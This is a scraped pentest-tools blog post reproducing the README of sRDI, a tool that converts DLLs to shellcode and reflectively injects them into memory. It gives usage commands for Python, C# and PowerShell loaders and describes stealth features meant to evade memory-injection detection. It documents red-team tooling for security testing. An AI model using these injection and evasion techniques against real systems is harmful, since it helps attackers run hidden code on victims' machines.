plugin.LinksProject homepageIRCWikiSlack and join channel #project-owtfUser DocumentationYoutube channelSlideshareBlogScreenshotsDownload OWTF

Link: http://feedproxy.google.com/~r/PentestTools/~3/QhjPP8mfh-A/owtf-v24-offensive-web-testing-framework.html

sRDI – Shellcode Implementation Of Reflective DLL Injection

sRDI allows for the conversion of DLL files to position independent shellcode.Functionality is accomplished via two components:C project which compiles a PE loader implementation (RDI) to shellcodeConversion code which attaches the DLL, RDI, and user data together with a bootstrapThis project is comprised of the following elements:ShellcodeRDI: Compiles shellcode for the DLL loaderNativeLoader: Converts DLL to shellcode if neccesarry, then injects into memoryDotNetLoader: C# implementation of NativeLoaderPython\ConvertToShellcode.py: Convert DLL to shellcode in placePython\EncodeBlobs.py: Encodes compiled sRDI blobs for static embeddingPowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in placeFunctionTest: Imports sRDI C function for debug testingTestDLL: Example DLL that includes two exported functions for call on Load and afterThe DLL does not need to be compiled with RDI, however the technique is cross compatiable.Use Cases / ExamplesBefore use, is recommend to you become familiar with Reflective DLL Injection and it’s purpose.Convert DLL to shellcode using pythonfrom ShellcodeRDI import *dll = open(“TestDLL_x86.dll", ‘rb’).read()shellcode = ConvertToShellcode(dll)Load DLL into memory using C# loaderDotNetLoader.exe TestDLL_x64.dllConvert DLL with python script and load with Native EXEpython ConvertToShellcode.py TestDLL_x64.dllNativeLoader.exe TestDLL_x64.binConvert DLL with powershell and load with Invoke-ShellcodeImport-Module .\Invoke-Shellcode.ps1Import-Module .\ConvertTo-Shellcode.ps1Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)Stealth ConsiderationsThere are many ways to detect memory injection. The loader function implements two stealth improvments on traditional RDI:Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completley wiped with null bytes on load (Except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/Powershell.BuildingThis project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The python script is written using Python 3.The Python and Powershell scripts are located at:Python\ConvertToShellcode.pyPowerShell\ConvertTo-Shellcode.ps1After building the project, the other binaries will be located at:bin\NativeLoader.exebin\DotNetLoader.exebin\TestDLL_.dllbin\ShellcodeRDI_.binDownload sRDI

Link: http://feedproxy.google.com/~r/PentestTools/~3/L7k0Is7EfEY/srdi-shellcode-implementation-of.html